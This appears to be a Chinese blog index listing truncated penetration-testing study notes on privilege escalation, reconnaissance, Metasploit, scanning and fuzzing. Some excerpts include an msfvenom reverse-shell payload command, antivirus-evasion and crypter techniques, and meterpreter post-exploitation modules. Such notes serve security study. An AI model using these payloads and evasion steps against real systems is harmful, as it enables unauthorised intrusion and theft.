web提权1234567891011121314151617181920212223242526272829303132333435363738394041424344451.能不能执行cmd就看这个命令：net user，net不行就用n

渗透测试学习笔记（信息收集）信息收集目的：信息收集作为渗透前期的准备工作扮演着极为重要的角色，我们的 最终目的是拿下目标，那么信息收集的目的就是为拿下目标进行铺路。良好的信息 收集能够更全面的掌握对方情况，并为你下一步的操作起到帮助决策的作

渗透测试学习笔记（基础篇）一.系统目录、服务、端口、注册表 系统目录 windows 12345系统安装目录，存放系统文件资料Windows/system32：系统配置文件，命令，粘滞键（sethc.exe）Windows/system3

METASPLOITexploit-db •Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重

1234567root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=4444 -f exe > shell.ex

windows下的免杀生成 如果需要捆绑正常软件运行使用shellter，如不能过免杀，再分步测试以下操作。cs文件编码混淆用AVIATOR生成。 1234567891.Lime-Crypter 注入线程2.DeepSeaOBFuscato

后渗透模块post后渗透模块 1234567891011121314151617181920run post/windows/manage/migrate #自动进程迁移run post/windows/gather/c

使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描 1xray webscan --basic-crawler http://example.com --html-output vuln.html 使用 HTTP 代理进行被动扫描 1xra

FUZZ什么是Fuzz技术?1Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试; Fuzz的核心思想: 目录Fuzz(漏洞点) 参数Fuzz(可利用参

command收集渗透中会用到的常用命令 command nmap 存活主机 bypass gobuster dirsearch nbtscan 代理工具 ssh grep mysql sqlmap hydra medusa pyth